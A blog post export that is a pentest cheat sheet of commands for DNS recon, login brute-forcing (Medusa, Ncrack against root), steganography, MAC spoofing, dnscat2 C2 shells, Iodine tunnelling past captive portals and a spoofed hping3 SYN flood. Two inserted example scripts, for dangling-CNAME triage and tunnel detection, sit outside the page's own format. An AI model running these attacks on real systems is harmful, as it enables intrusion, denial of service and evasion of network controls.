{"id":1838,"date":"2021-04-11T19:51:38","date_gmt":"2021-04-11T19:51:38","guid":{"rendered":"https:\/\/dft.wiki\/?p=1838"},"modified":"2024-03-24T09:42:29","modified_gmt":"2024-03-24T13:42:29","slug":"hacking-tools-cheat-sheet-4","status":"publish","type":"post","link":"https:\/\/dft.wiki\/?p=1838","title":{"rendered":"Hacking Tools Cheat Sheet #4"},"content":{"rendered":"<h5>Reference List<\/h5>\n<ol>\n<li><a href=\"#MassDNS\">MassDNS<\/a><\/li>\n<li><a href=\"#ShuffleDNS\">ShuffleDNS<\/a><\/li>\n<li><a href=\"#DNSProbe\">DNSProbe<\/a><\/li>\n<li><a href=\"#Amass\">Amass<\/a><\/li>\n<li><a href=\"#Jok3r\">Jok3r<\/a><\/li>\n<li><a href=\"#Medusa\">Medusa<\/a><\/li>\n<li><a href=\"#Ncrack\">Ncrack<\/a><\/li>\n<li><a href=\"#SubBrute\">SubBrute<\/a><\/li>\n<li><a href=\"#Steghide\">Steghide<\/a><\/li>\n<li><a href=\"#StegCracker\">StegCracker<\/a><\/li>\n<li><a href=\"#Zsteg\">Zsteg<\/a><\/li>\n<li><a href=\"#Exiv2\">Exiv2<\/a><\/li>\n<li><a href=\"#Binwalk\">Binwalk<\/a><\/li>\n<li><a href=\"#oleVBA\">oleVBA<\/a><\/li>\n<li><a href=\"#MACchanger\">MACchanger<\/a><\/li>\n<li><a href=\"#DNScat\">DNScat2<\/a><\/li>\n<li><a href=\"#Iodine\">Iodine<\/a><\/li>\n<li><a href=\"#hping3\">hping3<\/a><\/li>\n<li><a href=\"#WhatWeb\">WhatWeb<\/a><\/li>\n<li><a href=\"#NetDiscover\">NetDiscover<\/a><\/li>\n<li><a href=\"#Zmap\">Zmap<\/a><\/li>\n<li><a href=\"#Zgrab\">Zgrab<\/a><\/li>\n<li><a href=\"#ZDNS\">ZDNS<\/a><\/li>\n<li><a href=\"#Villain\">Villain<\/a><\/li>\n<li><a href=\"#dnsTwist\">dnsTwist<\/a><\/li>\n<li><a href=\"#Ligolong\">Ligolo-ng<\/a><\/li>\n<li><a href=\"#Chisel\">Chisel<\/a><\/li>\n<\/ol>\n<hr id=\"MassDNS\" \/>\n<p><strong>MassDNS<\/strong> &#8211; A high-performance DNS stub resolver for massive amounts of domains [<a href=\"https:\/\/github.com\/blechschmidt\/massdns\">Link<\/a>]. Its repository ships a list of public resolvers (<code>lists\/resolvers.txt<\/code>); validate it before a large run, because public resolver lists always contain dead resolvers and resolvers that return forged answers, and both pollute the results. 
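<p>Triaging massdns output for dangling CNAMEs is the first step of what Subjack automates. The script below is an added example, not code from this page or from the massdns or Subjack projects: it reads the simple one-record-per-line format that <code>massdns -o S<\/code> writes and reports CNAMEs that leave the apex zone, marking targets that did not resolve in the same run as dangling. The sample lines are constructed (documentation IP ranges), and the apex domain <code>example.com<\/code> is an assumption.<\/p>

```sh
#!/bin/sh
# Added example (not from the original page or the massdns/Subjack projects).
# Reads massdns simple output ("name. TYPE rdata" per line, as produced by
# `massdns -o S`) and lists names whose CNAME points outside the apex zone,
# marking targets that never resolved in the same run as DANGLING. A dangling
# external CNAME is only a takeover *candidate*: whether the provider lets an
# attacker claim that hostname must still be checked (Subjack does this with
# per-provider fingerprints).

# Constructed sample mimicking `massdns -o S` output (documentation ranges).
SAMPLE_MASSDNS='www.example.com. A 192.0.2.10
www.example.com. AAAA 2001:db8::10
blog.example.com. CNAME ghs.googlehosted.com.
ghs.googlehosted.com. A 198.51.100.7
legacy.example.com. CNAME legacy-app.pages.example.net.
app.example.com. CNAME www.example.com.
www.example.com. A 192.0.2.10'

# usage: massdns_dangling_cnames <apex-domain>   (massdns -o S output on stdin)
massdns_dangling_cnames() {
    apex=$1
    awk -v apex="$apex" '
    {
        name = tolower($1); type = $2; rdata = tolower($3)
        sub(/\.$/, "", name); sub(/\.$/, "", rdata)   # strip trailing root dot
    }
    type == "A" || type == "AAAA" { resolved[name] = 1 }
    type == "CNAME"               { cname[name] = rdata }
    END {
        suffix = "." apex
        for (n in cname) {
            t = cname[n]
            # CNAMEs that stay inside the apex zone are not takeover material
            if (t == apex || substr(t, length(t) - length(suffix) + 1) == suffix) continue
            status = (t in resolved) ? "resolves" : "DANGLING"
            printf "%s -> %s [%s]\n", n, t, status
        }
    }' | sort
}

# Stand-alone demo: prints the two external CNAMEs, one of them DANGLING
printf '%s\n' "$SAMPLE_MASSDNS" | massdns_dangling_cnames example.com
```

<p>Feed it real data with <code>massdns -r resolvers.txt -t A -o S domains.lst | massdns_dangling_cnames example.com<\/code>. A target marked DANGLING still has to be checked against the provider (does it answer with a &#8220;no such app&#8221; page, and can the name be claimed?) before it is reported as a takeover.<\/p>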
See also Subjack: it scans a list of subdomains concurrently and identifies those that can be hijacked, i.e. dangling CNAMEs that point at unclaimed third-party services [<a href=\"https:\/\/github.com\/haccer\/subjack\">Link<\/a>].<\/p>\n<pre>sudo apt install massdns\r\nmassdns -r resolvers.txt -t A -o S -w results.txt domains.lst<\/pre>\n<p><code>-o S<\/code> selects the simple one-record-per-line output, which is the easiest to post-process.<\/p>\n<hr id=\"ShuffleDNS\" \/>\n<p><strong>ShuffleDNS<\/strong> &#8211; A wrapper around massdns that brute-forces and resolves subdomains and filters out wildcard DNS answers [<a href=\"https:\/\/github.com\/projectdiscovery\/shuffledns\">Link<\/a>]. It needs the <code>massdns<\/code> binary in the PATH.<\/p>\n<pre>go install -v github.com\/projectdiscovery\/shuffledns\/cmd\/shuffledns@latest\r\nwget https:\/\/raw.githubusercontent.com\/blechschmidt\/massdns\/master\/lists\/resolvers.txt\r\n~\/go\/bin\/shuffledns -h<\/pre>\n<p>Note: <code>go get<\/code> no longer installs binaries, so use <code>go install ...@latest<\/code>. Download the resolver list from the raw URL; the <code>github.com\/...\/blob\/...<\/code> URL returns an HTML page, not the list. Recent shuffledns releases also require the operation to be explicit (<code>-mode bruteforce<\/code> or <code>-mode resolve<\/code>).<\/p>\n<p>Subdomain brute-forcing:<\/p>\n<pre>~\/go\/bin\/shuffledns -d example.com -w wordlist.lst -r resolvers.txt -t 200<\/pre>\n<p>To resolve a list of subdomains:<\/p>\n<pre>~\/go\/bin\/shuffledns -d example.com -list subdomains.lst -r resolvers.txt\r\nsubfinder -d example.com -silent | ~\/go\/bin\/shuffledns -d example.com -r resolvers.txt<\/pre>\n<hr id=\"DNSProbe\" \/>\n<p><strong>DNSProbe<\/strong> &#8211; Performs DNS queries of a chosen record type (A, AAAA, CNAME, TXT, MX) against a list of resolvers [<a href=\"https:\/\/github.com\/projectdiscovery\/dnsprobe\">Link<\/a>]. The project is archived; its successor from the same authors is dnsx [<a href=\"https:\/\/github.com\/projectdiscovery\/dnsx\">Link<\/a>], e.g. <code>subfinder -d example.com -silent | dnsx -silent -cname -resp<\/code>.<\/p>\n<pre>go install -v github.com\/projectdiscovery\/dnsprobe@latest\r\nsubfinder -d example.com -silent | ~\/go\/bin\/dnsprobe -r <strong>cname<\/strong>\r\nsubfinder -d example.com -silent | ~\/go\/bin\/dnsprobe -r <strong>txt<\/strong>\r\nsubfinder -d example.com -silent | ~\/go\/bin\/dnsprobe -r <strong>mx<\/strong>\r\nsubfinder -d example.com -silent | ~\/go\/bin\/dnsprobe -r <strong>a<\/strong>\r\nsubfinder -d example.com -silent | ~\/go\/bin\/dnsprobe -r <strong>aaaa<\/strong> -silent<\/pre>\n<hr id=\"Amass\" \/>\n<p><strong>Amass<\/strong> &#8211; The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and 
active reconnaissance techniques [<a href=\"https:\/\/github.com\/OWASP\/Amass\">Link<\/a>].<\/p>\n<p>Features<\/p>\n<ul>\n<li><strong>DNS:<\/strong> Brute-forcing, rDNS sweeping, NSEC zone walking, Zone transfers, FQDN alterations\/permutations, FQDN Similarity-based Guessing.<\/li>\n<li><strong>Scraping:<\/strong> Ask, Baidu, Bing, BuiltWith, DNSDumpster, HackerOne, IPv4Info, RapidDNS, Riddler, SiteDossier, Yahoo.<\/li>\n<li><strong>Certificates:<\/strong> Active pulls (optional), Censys, CertSpotter, Crtsh, FacebookCT, GoogleCT.<\/li>\n<li><strong>APIs:<\/strong> AlienVault, Anubis, BinaryEdge, BGPView, BufferOver, C99, CIRCL, Cloudflare, CommonCrawl, DNSDB, GitHub, HackerTarget, Mnemonic, NetworksDB, PassiveTotal, Pastebin, RADb, ReconDev, Robtex, SecurityTrails, ShadowServer, Shodan, SonarSearch, Spyse, Sublist3rAPI, TeamCymru, ThreatBook, ThreatCrowd, ThreatMiner, Twitter, Umbrella, URLScan, VirusTotal, WhoisXML, ZETAlytics, ZoomEye.<\/li>\n<li><strong>Web Archives:<\/strong> ArchiveIt, ArchiveToday, Wayback.<\/li>\n<\/ul>\n<pre>sudo apt install amass\r\namass enum -d example.com\r\namass enum -passive -d example.com -src<\/pre>\n<p><code>-passive<\/code> skips all DNS resolution, so nothing is sent to the target&#8217;s name servers; <code>-src<\/code> prints the data source next to each finding. Most of the API sources return nothing until their keys are added to the Amass config file.<\/p>\n<hr id=\"Jok3r\" \/>\n<p><strong>Jok3r<\/strong> &#8211; A framework that aids penetration testers in network infrastructure and web security assessments [<a href=\"https:\/\/hub.docker.com\/r\/koutto\/jok3r\/\">Link<\/a>]. It automates the basic enumeration and scanning work with a few commands. 
It is a good starting point for surfacing the obvious vulnerabilities, not a replacement for manual testing.<\/p>\n<p>Installing and executing:<\/p>\n<pre>sudo docker pull koutto\/jok3r\r\nsudo docker run -i -t --name jok3r-container -w \/root\/jok3r -e DISPLAY=$DISPLAY -v \/tmp\/.X11-unix:\/tmp\/.X11-unix --shm-size 2g --net=host koutto\/jok3r<\/pre>\n<p>The final image is about 16.4 GB \ud83d\ude41 <code>--net=host<\/code> gives the container the host&#8217;s network stack, which the scanners need; the X11 socket mount is only required for tools that open a GUI.<\/p>\n<p>Re-starting or getting a shell:<\/p>\n<pre>sudo docker start -i jok3r-container\r\nsudo docker exec -it jok3r-container bash<\/pre>\n<pre>.\/jok3r.py info --checks http\r\n.\/jok3r.py attack -t https:\/\/example.com\/ --add2db default\r\n.\/jok3r.py attack -t https:\/\/example.com\/ --add2db default --fast\r\n.\/jok3r.py db<\/pre>\n<p>Inside the <code>db<\/code> shell:<\/p>\n<pre>mission -h\r\nhosts\r\nservices\r\nproducts\r\nvulns\r\nvulns --no-truncation\r\ncreds\r\nreport<\/pre>\n<p>To copy the reports to the host machine:<\/p>\n<pre>sudo docker cp jok3r-container:\/root\/jok3r\/reports\/ .<\/pre>\n<hr id=\"Medusa\" \/>\n<p><strong>Medusa<\/strong> &#8211; A fast, parallel, modular login brute-forcer with modules for SMB (<code>smbnt<\/code>), SSH, FTP, HTTP, MSSQL, MySQL, VNC, Telnet and other services [<a href=\"http:\/\/foofus.net\/goons\/jmk\/medusa\/medusa.html\">Link<\/a>]. Like any online password attack it is noisy and can lock accounts out, so check the lockout policy before running it with a large list.<\/p>\n<pre>medusa -d\r\nmedusa -M smbnt -q\r\nmedusa -h 192.168.0.1 -u root -P passwords.txt -e ns -M smbnt\r\nmedusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbnt\r\nmedusa -M smbnt -C combo.txt\r\nmedusa -M smbnt -C combo.txt -H hosts.txt<\/pre>\n<ul>\n<li>-d\n<ul>\n<li>list available modules<\/li>\n<\/ul>\n<\/li>\n<li>-q\n<ul>\n<li>display usage info of the module given with -M<\/li>\n<\/ul>\n<\/li>\n<li>-M\n<ul>\n<li>module to run (the protocol)<\/li>\n<\/ul>\n<\/li>\n<li>-h\n<ul>\n<li>hostname or IP<\/li>\n<\/ul>\n<\/li>\n<li>-H\n<ul>\n<li>file with a list of hosts<\/li>\n<\/ul>\n<\/li>\n<li>-u\n<ul>\n<li>username<\/li>\n<\/ul>\n<\/li>\n<li>-U\n<ul>\n<li>file with a list of usernames<\/li>\n<\/ul>\n<\/li>\n<li>-p\n<ul>\n<li>password<\/li>\n<\/ul>\n<\/li>\n<li>-P\n<ul>\n<li>file with a list of passwords<\/li>\n<\/ul>\n<\/li>\n<li>-C\n<ul>\n<li>combo file with <code>host:user:password<\/code> entries; an empty field is taken from the corresponding option or list<\/li>\n<\/ul>\n<\/li>\n<li>-e\n<ul>\n<li>additional password checks, <strong>n<\/strong> for no password and <strong>s<\/strong> for password = username<\/li>\n<\/ul>\n<\/li>\n<li>-T\n<ul>\n<li>number of hosts tested concurrently<\/li>\n<\/ul>\n<\/li>\n<li>-t\n<ul>\n<li>number of logins tested concurrently per host<\/li>\n<\/ul>\n<\/li>\n<li>-L\n<ul>\n<li>parallelize logins using one username per thread<\/li>\n<\/ul>\n<\/li>\n<li>-F\n<ul>\n<li>stop scanning a host after the first valid username\/password is found<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<hr id=\"Ncrack\" \/>\n<p><strong>Ncrack<\/strong> &#8211; A high-speed network authentication cracking tool developed by the Nmap team [<a href=\"https:\/\/nmap.org\/ncrack\/\">Link<\/a>]. The supported protocols include SSH, RDP, FTP, Telnet, HTTP(S), POP3(S), IMAP, SMB, VNC, SIP, Redis, PostgreSQL, MySQL, MSSQL, MongoDB, Cassandra, WinRM, and OWA. Ncrack has no <code>-u<\/code> option: a single username is given with <code>--user<\/code> (a single password with <code>--pass<\/code>), lists with <code>-U<\/code> and <code>-P<\/code>.<\/p>\n<pre>ncrack --user root -p ssh -P passwords.txt 10.10.10.10\r\nncrack --user root -p 22 -P passwords.txt -T5 10.10.10.10\r\nncrack --user root -p 21 -P passwords.txt -T5 10.10.10.10\r\nncrack --user root -p 21 -P passwords.txt 10.10.10.10\r\nncrack --user root -p 3389 -P passwords.txt 10.10.10.10\r\nncrack -U users.txt -P passwords.txt ssh:\/\/10.10.10.10 -oN ncrack.txt<\/pre>\n<p><code>-T5<\/code> is the most aggressive timing template; against services with a lockout policy throttle instead, e.g. <code>-g cl=1<\/code> to cap the parallel connections per service.<\/p>\n<hr id=\"SubBrute\" \/>\n<p><strong>SubBrute<\/strong> &#8211; A brute-force tool to discover subdomains that spreads its queries over many open resolvers [<a href=\"https:\/\/github.com\/TheRook\/subbrute\">Link<\/a>].<\/p>\n<pre>.\/subbrute.py example.com\r\n.\/subbrute.py onedomain.com anotherdomain.com\r\n.\/subbrute.py example.com &gt; output.txt\r\n.\/subbrute.py -t domainslist.txt<\/pre>\n<hr id=\"Steghide\" \/>\n<p><strong>Steghide<\/strong> &#8211; A steganography tool that hides data inside JPEG, BMP, WAV and AU files, optionally protected by a passphrase (the payload is encrypted with Rijndael-128 by default) [<a href=\"https:\/\/salsa.debian.org\/pkg-security-team\/steghide\">Link<\/a>].<\/p>\n<pre>sudo apt install steghide steghide-doc -y\r\nsteghide info fileName\r\nsteghide embed -cf image.jpg -ef secret.txt -v\r\nsteghide extract -sf image.jpg\r\nsteghide extract -sf image.jpg -p password\r\nsteghide embed -cf audio.wav -ef secret.txt -p password\r\nsteghide --encinfo\r\nsteghide embed -cf image.bmp -ef secret.txt -e des<\/pre>\n<hr id=\"StegCracker\" \/>\n<p><strong>StegCracker<\/strong> &#8211; Steganography brute-force utility that runs <code>steghide extract<\/code> against every passphrase in a wordlist [<a href=\"https:\/\/github.com\/Paradoxis\/StegCracker\">Link<\/a>]. The project is archived and its author recommends Stegseek, which does the same job orders of magnitude faster [<a href=\"https:\/\/github.com\/RickdeJager\/stegseek\">Link<\/a>].<\/p>\n<pre>pip3 install stegcracker\r\nstegcracker fileName \/path\/wordlist.txt\r\nstegseek fileName \/path\/wordlist.txt<\/pre>\n<hr id=\"Zsteg\" \/>\n<p><strong>Zsteg<\/strong> &#8211; A tool that detects hidden data in PNG and BMP files (LSB steganography, embedded zlib streams, OpenStego, Camouflage and others) [<a href=\"https:\/\/github.com\/zed-0xff\/zsteg\">Link<\/a>].<\/p>\n<pre>gem install zsteg\r\nzsteg fileName\r\nzsteg -a fileName\r\nzsteg -E \"b8,rgb,lsb,xy\" fileName &gt; extracted.exe<\/pre>\n<p><code>-a<\/code> tries all known methods; <code>-E<\/code> extracts the payload found by the named method.<\/p>\n<hr id=\"Exiv2\" \/>\n<p><strong>Exiv2<\/strong> &#8211; A command-line utility to read, write, delete and modify Exif, IPTC, XMP, and ICC image metadata [<a href=\"https:\/\/github.com\/Exiv2\/exiv2\">Link<\/a>]. Official website [<a href=\"https:\/\/www.exiv2.org\/\">Link<\/a>].<\/p>\n<pre>sudo apt install exiv2 -y\r\nexiv2 fileName\r\nexiv2 -pa fileName\r\nexiv2 rm fileName<\/pre>\n<p><code>-pa<\/code> prints all metadata (GPS coordinates, camera serial numbers and editing software are the usual finds); <code>rm<\/code> strips it before a file is published.<\/p>\n<hr id=\"Binwalk\" \/>\n<p><strong>Binwalk<\/strong> &#8211; A tool for analyzing, reverse engineering, and extracting firmware images [<a href=\"https:\/\/github.com\/ReFirmLabs\/binwalk\">Link<\/a>].<\/p>\n<pre>sudo apt install binwalk -y\r\nbinwalk fileName\r\nbinwalk -e fileName\r\nbinwalk -Me fileName<\/pre>\n<p><code>-e<\/code> extracts the embedded files it recognizes; <code>-M<\/code> recurses into what was extracted.<\/p>\n<hr id=\"oleVBA\" \/>\n<p><strong>oleVBA<\/strong> &#8211; A script from the oletools suite that parses OLE and OpenXML files such as MS Office documents to extract and analyze VBA macro code [<a href=\"https:\/\/github.com\/decalage2\/oletools\/blob\/master\/oletools\/olevba.py\">Link<\/a>]. Current oletools installs the command as <code>olevba<\/code>; the <code>olevba3<\/code> alias of older releases is gone.<\/p>\n<pre>pip3 install oletools\r\nolevba fileName.doc\r\nolevba --deobf fileName.xls\r\nolevba -a fileName.docm<\/pre>\n<p>The analysis table olevba prints (auto-exec triggers, suspicious keywords, IOCs such as URLs and file names) is usually enough for triage, and <code>--deobf<\/code> decodes the common string obfuscation tricks. Do not paste extracted macros into a general-purpose online compiler: those services are not VBA interpreters, and a macro that does run executes its payload. To see what a macro actually does, emulate it with ViperMonkey (<code>vmonkey<\/code>) [<a href=\"https:\/\/github.com\/decalage2\/ViperMonkey\">Link<\/a>] or detonate the document in an isolated sandbox VM.<\/p>\n<hr id=\"MACchanger\" \/>\n<p><strong>MACchanger<\/strong> &#8211; A utility that makes the manipulation of MAC addresses of network interfaces easier [<a href=\"https:\/\/github.com\/alobbs\/macchanger\">Link<\/a>]. The interface must be down while the address is changed, and a fresh DHCP lease is needed afterwards.<\/p>\n<pre>sudo apt install macchanger -y\r\nmacchanger -h\r\nmacchanger -s eth0\r\nsudo ifconfig eth0 down\r\nsudo macchanger -r eth0\r\nsudo ifconfig eth0 up\r\nmacchanger -s eth0<\/pre>\n<p>Spoof a known MAC address vendor (<code>-l<\/code> lists the OUI table; <code>-a<\/code> picks a random address of the same kind from a known vendor, which stands out less than a fully random one):<\/p>\n<pre>macchanger -l\r\nsudo macchanger -m 00:00:17:22:22:22 eth0\r\nsudo macchanger -a eth0<\/pre>\n<p>Alternatively, without macchanger (the second form uses <code>iproute2<\/code>, which has replaced <code>ifconfig<\/code> on most distributions):<\/p>\n<pre>sudo ifconfig eth0 down\r\nsudo ifconfig eth0 hw ether 00:00:17:22:22:22\r\nsudo ifconfig eth0 up\r\nifconfig -a\r\n\r\nOR\r\n\r\nsudo ip link set dev eth0 down\r\nsudo ip link set dev eth0 address 00:00:17:22:22:22\r\nsudo ip link set dev eth0 up\r\nip link show eth0<\/pre>\n<hr id=\"DNScat\" \/>\n<p><b>DNScat2<\/b> &#8211; Designed to create an encrypted client-server channel over the DNS protocol (DNS tunneling) [<a href=\"https:\/\/github.com\/iagox86\/dnscat2\">Link<\/a>] [<a href=\"https:\/\/gitlab.com\/kalilinux\/packages\/dnscat2\">Link<\/a>]. It can carry multiple TCP tunnels, for SSH and HTTP for example. It is widely used as a C2 channel, which is also why its traffic pattern (bursts of TXT, CNAME or MX queries with long encoded labels to a single zone) is a standard detection trigger. Encryption is on by default but unauthenticated unless both sides are given the same <code>--secret<\/code>, so always set one. Getting it to work on a real network needs the same NS delegation as Iodine and a fair amount of tuning; I recommend and prefer Iodine instead.<\/p>\n<pre>sudo apt install dnscat2 -y\r\n\r\nOR\r\n\r\nsudo apt install dnscat2-server -y\r\nsudo apt install dnscat2-client -y<\/pre>\n<p><strong>Client<\/strong><\/p>\n<pre>dnscat -h\r\ndnscat domain.com\r\ndnscat --dns domain=domain.com\r\ndnscat --dns domain=domain.com,server=8.8.8.8,port=53\r\ndnscat --dns domain=domain.com,port=53 --no-cache\r\ndnscat --dns domain=domain.com,port=8053,type=A,CNAME\r\ndnscat --secret=SharedSecret --dns domain=domain.com<\/pre>\n<p>Using an established <strong>session<\/strong>:<\/p>\n<pre>session -i 12345\r\nhelp\r\nexec -h\r\nshell<\/pre>\n<p><strong>Server<\/strong><\/p>\n<pre>dnscat2-server -h\r\ndnscat2-server\r\ndnscat2-server domain.com\r\ndnscat2-server domain1.com domain2.net\r\ndnscat2-server --dns 'host=127.0.0.1,port=53,domain=domain1.com,domain=domain2.com'\r\ndnscat2-server --secret=SharedSecret domain.com<\/pre>\n<hr id=\"Iodine\" \/>\n<p><b>Iodine<\/b> &#8211; Tunnels IPv4 traffic (TCP\/UDP\/ICMP) through DNS by creating a logical network interface on the clients and connecting them (up to 16) as a private network [<a href=\"https:\/\/github.com\/yarrick\/iodine\">Link<\/a>] [<a href=\"https:\/\/code.kryo.se\/iodine\/\">Link<\/a>]. 
It is a fast and flexible DNS tunnel but <strong>does not offer encryption<\/strong>, so run something encrypted over it (SSH, WireGuard or another VPN) instead of plain traffic.<\/p>\n<pre>sudo apt install iodine -y\r\niodine -h<\/pre>\n<p><strong>Server<\/strong><\/p>\n<p>Delegate a subdomain to the server by configuring your domain with the following entries (<code>200.200.200.200<\/code> stands for the public IP of the iodine server):<\/p>\n<pre>iodine    IN NS iodine-ns.domain.com.\r\niodine-ns IN A  200.200.200.200\r\n\r\nOR\r\n\r\niodine    IN NS subdomain.duckdns.org.<\/pre>\n<p>Configure the server to route traffic from the Iodine network to the network interface that has internet access (in my case <code>enp0s3<\/code>):<\/p>\n<pre>sudo sysctl -w net.ipv4.ip_forward=1\r\nsudo iptables -t nat -A POSTROUTING -o <strong>enp0s3<\/strong> -j MASQUERADE\r\nsudo iptables -t filter -A FORWARD -i <strong>enp0s3<\/strong> -o dns0 -m state --state RELATED,ESTABLISHED -j ACCEPT\r\nsudo iptables -t filter -A FORWARD -i dns0 -o <strong>enp0s3<\/strong> -j ACCEPT<\/pre>\n<p>Then start the service (UDP port 53 must be reachable from the Internet, so stop any resolver already bound to it):<\/p>\n<pre>sudo iodined -f -P password 10.0.0.1 iodine.domain.com\r\nsudo iodined -f -c -P password 10.0.0.1 iodine.domain.com<\/pre>\n<p>If you do not specify a password on the command line it will prompt you for one.<\/p>\n<p>The argument <code>-f<\/code> keeps it running in the foreground, which is convenient for troubleshooting during testing. The argument <code>-c<\/code> disables the check of the client&#8217;s source IP and port on each request, which is needed when clients sit behind a NAT that rotates source ports.<\/p>\n<p>Note that a new network interface will be created with the name <code>dns0<\/code>.<\/p>\n<p><strong>Client<\/strong><\/p>\n<pre>sudo iodine -f -P password iodine.domain.com<\/pre>\n<p>This setup uses the DNS server of the client&#8217;s network as the relay for the packets: the local resolver forwards the queries for <code>iodine.domain.com<\/code> to your NS and returns the answers. It is the way to go when the network allows DNS traffic (port 53) only to the local trusted DNS server. 
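<p>What this traffic looks like from the defender&#8217;s side: a small heuristic over resolver query logs that flags zones receiving many distinct query names with long leftmost labels, the footprint iodine and dnscat2 leave even when the payload is encrypted. This is an added example, not part of the page or of either project; the log format (<code>epoch client qtype qname<\/code>) and the thresholds are assumptions, and the sample lines are constructed.<\/p>

```sh
#!/bin/sh
# Added example (not from the original page or the iodine/dnscat2 projects).
# DNS tunnels encode data in query names, so the tunnel zone receives a stream
# of never-repeating names with long leftmost labels. This flags zones whose
# queries look like that in a resolver log. Assumed (constructed) log format:
#   <epoch> <client_ip> <qtype> <qname>
# Thresholds are assumptions for the sample; tune them per environment.

# Constructed sample log: ordinary traffic plus an iodine-style tunnel.
SAMPLE_LOG='1700000000 10.0.0.5 A www.example.com
1700000001 10.0.0.5 AAAA www.example.com
1700000002 10.0.0.7 A mail.example.com
1700000003 10.0.0.9 NULL tpqp3rq7r6zuwhcdxbaggfafx2mfpgxlwuqyhhuwyoa4lq2rmy.t.attacker.tld
1700000004 10.0.0.9 NULL 0zvzj7a3q4mtpnwf7kpnr4rhy3kpesppfpgmwejvoj3wwnq5ww.t.attacker.tld
1700000005 10.0.0.9 NULL q2nfzw7k3tbmxh4ydq6cpa5rmj2szkvh3ul8eyqng7xt9cwbfr.t.attacker.tld
1700000006 10.0.0.9 NULL hj4ykp6mvza2qrw8ndf3tc7bxs5lgue9mkz4pqhwn6vyr2jdta.t.attacker.tld
1700000007 10.0.0.9 NULL m8dqz3wkvfr5nph2ytbxc4lsj7gaukw9eqm6zrhnp3tdv5xkyc.t.attacker.tld
1700000008 10.0.0.9 NULL z7kwm4bqtfv2nyr8xcgdh6psj3ulaek9qzw5mrtbd4fxn7ycvh.t.attacker.tld
1700000009 10.0.0.7 A www.example.com'

# usage: flag_dns_tunnels [min_unique_names] [min_label_length]  (log on stdin)
flag_dns_tunnels() {
    awk -v min_unique="${1:-5}" -v min_label="${2:-30}" '
    {
        qname = tolower($4); sub(/\.$/, "", qname)
        n = split(qname, lab, ".")
        if (n < 3) next                     # apex or 2-label names carry no payload
        zone = lab[n-1] "." lab[n]          # crude registrable-domain guess (assumption)
        key = zone SUBSEP qname
        if (!(key in seen)) { seen[key] = 1; uniq[zone]++ }
        if (length(lab[1]) > maxlab[zone]) maxlab[zone] = length(lab[1])
        total[zone]++
    }
    END {
        for (z in total)
            if (uniq[z] >= min_unique && maxlab[z] >= min_label)
                printf "%s unique=%d queries=%d max_label=%d\n", z, uniq[z], total[z], maxlab[z]
    }' | sort
}

# Stand-alone demo: only attacker.tld should be reported
printf '%s\n' "$SAMPLE_LOG" | flag_dns_tunnels
```

<p>The two-label zone guess is deliberately crude (it lumps <code>co.uk<\/code>-style suffixes together); a real detection should use the public suffix list and also watch the query type mix, since iodine defaults to NULL records and dnscat2 to TXT, CNAME and MX, none of which normal clients ask for in volume.<\/p>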
This is also how captive portals that let DNS through are bypassed.<\/p>\n<p>For direct access to the Iodine server, either pass its IP as the nameserver argument or point <code>\/etc\/resolv.conf<\/code> (not <code>resolve.conf<\/code>) at it:<\/p>\n<pre>sudo iodine -f -P password 200.200.200.200 iodine.domain.com\r\n\r\nOR\r\n\r\nnameserver 200.200.200.200<\/pre>\n<p>Then you can route all your traffic through the Iodine network interface (<code>dns0<\/code>). The order matters: first pin a host route for the DNS server (or for the local resolver in the relayed setup) through the original gateway, otherwise the tunnel&#8217;s own DNS packets are routed into the tunnel and the link dies; only then move the default route:<\/p>\n<pre>sudo ip route add 200.200.200.200 via 192.168.1.1 dev eth0\r\nsudo ip route replace default via 10.0.0.1 dev dns0\r\n\r\nOR (legacy net-tools)\r\n\r\nsudo route add -host 200.200.200.200 gw 192.168.1.1 eth0\r\nsudo route add -net 0.0.0.0\/0 gw 10.0.0.1 dns0<\/pre>\n<p>Here <code>192.168.1.1<\/code> and <code>eth0<\/code> stand for the client&#8217;s original gateway and interface (<code>ip route show default<\/code> prints both).<\/p>\n<hr id=\"hping3\" \/>\n<p><strong>hping3<\/strong> &#8211; A command-line oriented packet assembler and analyzer. It supports TCP, UDP, ICMP, and raw IP and can be used for firewall and network testing, port scanning, fingerprinting, auditing, DoS\/DDoS simulation, etc. Available at [<a href=\"https:\/\/salsa.debian.org\/debian\/hping3\">Link<\/a>] and [<a href=\"http:\/\/www.hping.org\/\">Link<\/a>].<\/p>\n<pre>sudo apt install hping3 -y\r\nhping3 --help\r\nsudo hping3 -S 10.1.1.1\r\nsudo hping3 -S 10.1.1.1 -p 8080\r\nsudo hping3 -S 10.1.1.1 -p 8080 -c 10\r\nsudo hping3 --scan 80-90,400-500 -A 10.1.1.1\r\nsudo hping3 -1 10.1.1.x --rand-dest -I eth0\r\nsudo hping3 -9 HELLO -I eth0\r\nsudo hping3 -S 10.1.1.1 -a 192.168.1.1 -p 443 --flood -I tun0<\/pre>\n<p>Notes: <code>-9<\/code> (listen mode) takes a signature string, not a host; hping3 prints whatever follows that string in any packet seen on the interface. <code>--rand-dest<\/code> fills the <code>x<\/code> in the address with random values and needs <code>-I<\/code>. The last line is a SYN flood from a spoofed source (<code>-a<\/code>) and belongs in a lab, not on a production network.<\/p>\n<p><strong>Modes<\/strong><\/p>\n<ul>\n<li>default mode\n<ul>\n<li>TCP mode.<\/li>\n<\/ul>\n<\/li>\n<li>-0 --rawip\n<ul>\n<li>RAW IP mode.<\/li>\n<\/ul>\n<\/li>\n<li>-1 --icmp\n<ul>\n<li>ICMP mode.<\/li>\n<\/ul>\n<\/li>\n<li>-2 --udp\n<ul>\n<li>UDP mode.<\/li>\n<\/ul>\n<\/li>\n<li>-8 --scan\n<ul>\n<li>SCAN mode.<\/li>\n<\/ul>\n<\/li>\n<li>-9 --listen\n<ul>\n<li>listening mode.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<hr id=\"WhatWeb\" \/>\n<p><strong>WhatWeb<\/strong> &#8211; A web scanner that identifies the technology stack that powers a website, such as web server, framework, language, CMS and their versions [<a href=\"https:\/\/morningstarsecurity.com\/research\/whatweb\">Link<\/a>].<\/p>\n<pre>whatweb https:\/\/example.com\r\nwhatweb -v -a 3 https:\/\/example.com<\/pre>\n<p>The default aggression level 1 sends a single request; <code>-a 3<\/code> lets plugins send the extra requests they need to confirm a match, and <code>-v<\/code> prints the plugin details.<\/p>\n<hr id=\"NetDiscover\" 
